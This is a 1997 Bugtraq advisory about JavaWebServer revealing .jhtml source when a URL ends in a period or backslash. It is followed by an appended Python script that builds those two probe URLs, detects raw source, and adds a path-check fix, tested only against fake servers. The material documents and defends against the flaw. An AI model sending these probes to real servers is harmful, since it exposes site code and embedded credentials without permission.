[5836] in bugtraq


Viewable .jhtml source with JavaWebServer

daemon@ATHENA.MIT.EDU (Brian Krahmer)
Fri Dec 19 15:50:02 1997

Date: 	Wed, 16 Jul 1997 14:01:05 -0500
Reply-To: Brian Krahmer <brian@KRAHMER.COM>
From: Brian Krahmer <brian@KRAHMER.COM>
To: BUGTRAQ@NETSPACE.ORG

It has been discovered by Min Chang that there is a security
vulnerability in the 1.1Beta version of JavaWebServer for win32.
Similar to the IIS viewable source bug, if you append a '.' (period) or
a '\' (backslash) to a .jhtml URL, the server will display the source.
.jhtml files are HTML files with embedded Java code that are supposed to
be compiled and returned to the client (sans the Java code).  Because
these files can have things like JDBC queries or important server
filenames embedded in them, it is a security risk.

Examples:
http://localhost/xyz.jhtml.
or
http://localhost/xyz.jhtml\

brian
--
  Brian Krahmer - brian@krahmer.com - http://www.krahmer.com
           President, Network Guardians, Inc.
  Makers of NetGuard.  1.0 release coming after the new year!
               http://www.net-guards.com
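The check a practitioner would run against the two URL variants in the post, as an added example that is not part of the original message. It builds the trailing-period and trailing-backslash probes, decides whether a response is raw .jhtml source rather than the compiled page, and shows the server-side path check that closes the hole. Assumptions not in the original: raw JHTML source is recognised by its `<java ...>` page-compilation tags, the `fetch` callable and the two fake servers are constructed stand-ins so the script runs offline, and `is_bypass_path` is an illustrative mitigation, not JavaWebServer's own fix.

```python
"""
Probe a JavaWebServer .jhtml URL for the trailing '.' / '\\' source-disclosure
variants described in the post.  Added example, not code from the post.
Assumptions: raw JHTML source is identified by <java ...> tags; the fetch
callable is injected so the check runs offline against constructed servers.
"""
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import urlsplit

# Suffixes from the post: a trailing period and a trailing backslash.
BYPASS_SUFFIXES = (".", "\\")

# Assumption: uncompiled .jhtml pages carry <java ...> tags, which a correctly
# compiled response never contains.
JAVA_TAG = re.compile(r"<java\b", re.IGNORECASE)


def probe_urls(base_url: str) -> List[str]:
    """Return the decorated-extension URLs to request for a .jhtml URL."""
    if not base_url.lower().endswith(".jhtml"):
        raise ValueError("expected a .jhtml URL")
    return [base_url + s for s in BYPASS_SUFFIXES]


def looks_like_jhtml_source(body: str) -> bool:
    """True if the body still contains embedded Java page markup."""
    return JAVA_TAG.search(body) is not None


def check_source_disclosure(fetch: Callable[[str], Tuple[int, str]],
                            base_url: str) -> Dict[str, bool]:
    """Request each variant; map suffix -> whether raw source came back."""
    results: Dict[str, bool] = {}
    for url in probe_urls(base_url):
        status, body = fetch(url)
        results[url[len(base_url):]] = (status == 200
                                        and looks_like_jhtml_source(body))
    return results


def is_bypass_path(path: str) -> bool:
    """Illustrative server-side check (assumption, not the vendor fix): reject
    request paths whose final segment ends with '.' or contains a backslash,
    so the compiled-page handler cannot be sidestepped by a decorated name."""
    last = path.rsplit("/", 1)[-1]
    return last.endswith(".") or "\\" in last


# ---- constructed fake servers standing in for a JavaWebServer install ----
RAW_SOURCE = (
    "<html><java type=import>java.sql.*</java>\n"
    "<java>Connection c = DriverManager.getConnection("
    "\"jdbc:odbc:orders\", \"sa\", \"secret\");</java>\n"
    "<body>Hello</body></html>"
)
RENDERED = "<html><body>Hello</body></html>"


def fake_vulnerable_fetch(url: str) -> Tuple[int, str]:
    """Constructed: hands back raw source when the extension is decorated."""
    if url.endswith(BYPASS_SUFFIXES):
        return 200, RAW_SOURCE
    if url.lower().endswith(".jhtml"):
        return 200, RENDERED
    return 404, "not found"


def fake_fixed_fetch(url: str) -> Tuple[int, str]:
    """Constructed: the same server with the path check applied first."""
    if is_bypass_path(urlsplit(url).path):
        return 404, "not found"
    return fake_vulnerable_fetch(url)


if __name__ == "__main__":
    target = "http://localhost/xyz.jhtml"
    print("vulnerable:", check_source_disclosure(fake_vulnerable_fetch, target))
    print("fixed:     ", check_source_disclosure(fake_fixed_fetch, target))
```

Against a live host, replace the fake fetch with a real one and make sure the client sends the raw backslash in the request line rather than percent-encoding it as `%5C`; an encoded backslash tests a different code path and can produce a false negative.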
